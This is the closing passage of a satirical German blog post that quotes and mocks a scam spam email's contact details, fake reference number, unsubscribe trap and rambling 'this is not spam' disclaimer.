Na, immerhin hast du dir einen hübschen Ort zum Leben ausgesucht, und sogar die Bildzeitung kriegst du da hingeliefert. Wie, da steht nur dein Briefkasten? Schade…

Fax +1818 572 xxxx

E-Mail trafisa (at) consultant (punkt) com (Bitte diese Mailanschrift nutzen)

Bitte die Spam nicht durch einen Klick auf die Schaltfläche „Beantworten“ beantworten, die Absenderadresse ist gefälscht. So als kleine Vertrauensgrundlage für jemanden, der ganz viel Geld verspricht.

Nr. Imp. Int. 1999-44-21

Diese Zahl ist bestimmt fast so wichtig wie die Gewinnzahlen, die immer in den Spams stehen, in denen mir meine Millionengewinne mitgeteilt werden.

Wenn Sie keine Newsletter möchten, klicken Sie hier no (strich) news (strich) trafisa (at) yway (punkt) com

So, und nach dieser Standardaufforderung, den Spammern zu sagen, unter welchen Adressen ihre Spam ankommt, gelesen wird und beklickt wird, kommt aus altem Brauch zum guten Schluss die großartigste Ansage des Halbhirnaffen:

Dies ist kein SPAM. Um weiterhin ohne Werbung auskommen zu können bitten wir alle Kunden mit erfüllten Auftrag d.h. erhaltener Auszahlung um Nennung von Personen bzw. Mailadressen wo Bedarf oder Interesse vermutet wird. Ihre Mailadresse wurde und von einen oder mehreren Klienten genannt um Ihnen diese Information zukommen zu lassen oder es ist eine Rückmeldung/ Anfrage / Antwort / Bekanntgabe /Reaktion auf den Eintrag / Anschreiben / Anfrage / Gesuch / Veröffentlichung /Bekanntgabe in / oder an ein Postfach/ Gästebuch / Mailfach / Linkliste / Anzeige / Klickmail Formular / Websiteeintragung bei uns und / oder einem unserer Partner / öffentliche Werbe – Agenturen/ -träger / Onlineanzeige- unternehmen. Es besteht kein Verstoß gegen bestehende Gesetze. Sollten Sie diese E-Mail mehr als einmal erhalten haben, bitten wir dieses zu entschuldigen. Es kann hin und wieder geschehen, dass manche Einträge / Anzeigen / Datensätze / Angaben doppelt, aber nicht gleicher Art / Inhalt sind. Ich versuche Spam definitiv zu vermeiden. . „No Spam Check“

Mit echtem „No Spam Check“ eines Spammers, der Spam definitiv zu vermeiden versucht!

Es sind schon Leute für deutlich geringere Realitätsverluste an die Klappsmüller übergeben worden…